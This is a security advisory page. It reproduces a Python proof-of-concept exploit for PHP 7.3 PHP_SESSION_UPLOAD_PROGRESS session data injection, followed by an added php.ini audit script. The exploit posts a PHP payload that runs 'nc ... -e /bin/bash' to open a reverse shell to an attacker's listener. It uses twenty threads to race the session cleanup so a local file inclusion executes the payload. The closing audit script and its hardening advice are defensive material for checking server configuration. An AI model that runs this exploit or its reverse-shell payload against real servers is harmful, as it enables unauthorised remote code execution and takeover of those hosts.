PHP 7.3.15-3 PHP_SESSION_UPLOAD_PROGRESS Session Data Injection

2021.07.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#!/usr/bin/python3
# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Date: 26/7/2021
# Exploit Author: SiLvER | Faisal Alhadlaq
# Tested on: PHP Version 7.3.15-3
# This PoC abuses PHP_SESSION_UPLOAD_PROGRESS and then triggers a race condition
# to get remote code execution; the script returns a reverse shell using netcat.
"""
Usage : python3 poc.py <Target URL> <ListnerIP> <ListnerPORT>
        python3 poc.py https://xyz.xyz 192.168.1.15 1337
"""
import requests
import threading
import datetime
import sys

# Every worker keeps firing requests for 10 seconds, then stops.
x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
newDatetime = x + addSeconds


def fuzz():
    targetIP = sys.argv[1]
    listnerIP = sys.argv[2]
    listnerPORT = sys.argv[3]
    global newDatetime
    while True:
        try:
            if datetime.datetime.now() > newDatetime:
                exit()
            # proxies = {
            #     "http": "http://127.0.0.1:8080",
            #     "https": "https://127.0.0.1:8080",
            # }
            # Attacker-chosen session ID: PHP stores the upload progress data in
            # /var/lib/php/sessions/sess_<PHPSESSID>, so the file name is known.
            sessionName = "SiLvER"
            url = targetIP
            s = requests.Session()
            cookies = {'PHPSESSID': sessionName}
            # The PHP_SESSION_UPLOAD_PROGRESS field value is written into the
            # session file (under the upload_progress_ prefix); the padded dummy
            # upload keeps the request in progress while the LFI reads the file.
            files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc ' + listnerIP + ' ' + listnerPORT + ' -e /bin/bash`;?>'),
                     'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq ' * 100, 'application/octet-stream')}
            # You need to change the parameter in your case; here the vulnerable parameter is (lfi)
            params = (('lfi', '/var/lib/php/sessions/sess_' + sessionName),)
            x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)  # , proxies=proxies
        except Exception as error:
            print(error)
            exit()


def main():
    print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
    threads = []
    # 20 concurrent workers to win the race before session.upload_progress.cleanup
    # removes the injected data at the end of each upload.
    for _ in range(20):
        t = threading.Thread(target=fuzz)
        t.start()
        threads.append(t)
    for thread in threads:
        thread.join()


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))
        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
        print("\n(=) By SiLvER \n")
        exit()
    else:
        main()
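The PoC only works because of a small set of php.ini directives: session.upload_progress.enabled (on by default) makes PHP write the PHP_SESSION_UPLOAD_PROGRESS field value into the session file, session.upload_progress.cleanup (on by default) deletes it again when the upload finishes, which is why the script has to race, and session.use_strict_mode (off by default) lets the client pick the PHPSESSID and therefore the sess_ file name. The audit script below is an added example, not part of the original PoC and not PHP's own code: it reads php.ini text, applies PHP's documented defaults for anything missing, and reports the combination the PoC relies on next to what the hardened values would be. The two ini fragments are constructed samples and the function names are this example's own.

```python
"""Audit php.ini for the settings that make PHP_SESSION_UPLOAD_PROGRESS usable
as a session-file injection primitive (added example, not the PoC's code)."""
import re

# PHP's built-in defaults for the directives involved.
PHP_DEFAULTS = {
    "session.upload_progress.enabled": "1",
    "session.upload_progress.cleanup": "1",
    "session.upload_progress.prefix": "upload_progress_",
    "session.upload_progress.name": "PHP_SESSION_UPLOAD_PROGRESS",
    "session.use_strict_mode": "0",
}

_DIRECTIVE = re.compile(r"^([A-Za-z0-9_.]+)\s*=\s*(.*)$")

# Constructed sample: PHP 7.3 defaults, except cleanup has been switched off.
WEAK_INI = """
[Session]
session.upload_progress.enabled = On
session.upload_progress.cleanup = Off   ; injected data survives the upload
session.use_strict_mode = 0
"""

# Constructed sample: the hardened configuration.
HARDENED_INI = """
[Session]
session.upload_progress.enabled = Off
session.use_strict_mode = 1
"""


def parse_php_ini(text):
    """Minimal php.ini reader: ignores [sections] and ; comments, strips quotes."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        m = _DIRECTIVE.match(line)
        if m:
            settings[m.group(1).lower()] = m.group(2).strip().strip("\"'")
    return settings


def is_on(value):
    """php.ini boolean: 1/On/True/Yes are on, everything else is off."""
    return value.strip().lower() in ("1", "on", "true", "yes")


def effective_settings(ini_text):
    """Defaults overlaid with whatever the ini file sets explicitly."""
    settings = dict(PHP_DEFAULTS)
    settings.update(parse_php_ini(ini_text))
    return settings


def session_key(settings, posted_value):
    """Name of the $_SESSION entry PHP creates for an upload-progress request:
    prefix + the value posted in the session.upload_progress.name field. This
    is why a '<?php ... ?>' value ends up verbatim in the sess_ file."""
    return settings["session.upload_progress.prefix"] + posted_value


def audit_upload_progress(ini_text):
    """Return (directive, message) pairs for each setting the PoC depends on."""
    s = effective_settings(ini_text)
    findings = []
    if is_on(s["session.upload_progress.enabled"]):
        findings.append(("session.upload_progress.enabled",
                         "on: a multipart POST carrying a %s field writes that field's "
                         "value into the session file; set to Off if progress tracking is unused"
                         % s["session.upload_progress.name"]))
        if is_on(s["session.upload_progress.cleanup"]):
            findings.append(("session.upload_progress.cleanup",
                             "on: data is removed when the upload completes, so an include "
                             "must race the upload (what the PoC's 20 threads do)"))
        else:
            findings.append(("session.upload_progress.cleanup",
                             "off: injected data stays in the session file after the upload, "
                             "no race needed; set to On"))
    if not is_on(s["session.use_strict_mode"]):
        findings.append(("session.use_strict_mode",
                         "off: PHP accepts an uninitialized PHPSESSID from the client, so the "
                         "attacker chooses the sess_<id> file name; set to 1"))
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI), ("defaults", "")):
        print("[%s]" % label)
        for directive, message in audit_upload_progress(ini):
            print("  %s %s" % (directive, message))
```

Run it as-is to see all three configurations reported; point effective_settings() at the output of `php --ini` / the loaded php.ini to audit a real host. Turning session.upload_progress.enabled off removes the write primitive entirely; session.use_strict_mode on takes away the predictable file name even where progress tracking must stay enabled.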


Copyright 2021, cxsecurity.com